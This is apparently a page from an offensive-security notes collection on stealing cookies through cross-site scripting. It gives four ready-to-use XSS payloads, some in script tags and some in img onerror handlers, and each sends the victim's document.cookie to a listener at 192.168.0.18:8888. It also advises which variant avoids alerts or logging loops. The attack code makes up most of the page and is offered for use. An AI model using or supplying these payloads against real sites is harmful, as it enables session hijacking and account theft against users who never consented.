XSS cookie stealing

Inject the XSS Attack Code

Below are four versions of the same attack.

Run this version of the attack code if you want to see the cookie in a JS alert() as confirmation that the injection is successfully exploiting the vulnerability on the target site. Note that the cookie will not upload to your Python listener until the victim closes the JS alert() dialog.

<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

2. Silent One-Liner

This one is the same but no alert() and all on one line.

<script>var i=new Image;i.src="http://192.168.0.18:8888/?"+document.cookie;</script>

3. `<img>` Tag Instead of `<script>` Tags

Don't use this one! It works but calls onerror() in a loop, filling up your stolen cookie log:

<img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>

4. `<img>` Tag and Without the Infinite Loop

This one works and will only steal the cookie once. I adapted it from a posting on the old [kirupa.com][4] forum.

<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">

PreviousXSS All in one NextPayloads / Cheatsheet

Last updated 1 year ago

Was this helpful?

Inject the XSS Attack Code

1. alert() Before Stealing the Cookie

2. Silent One-Liner

3. <img> Tag Instead of <script> Tags

4. <img> Tag and Without the Infinite Loop

1. `alert()` Before Stealing the Cookie

3. `<img>` Tag Instead of `<script>` Tags

4. `<img>` Tag and Without the Infinite Loop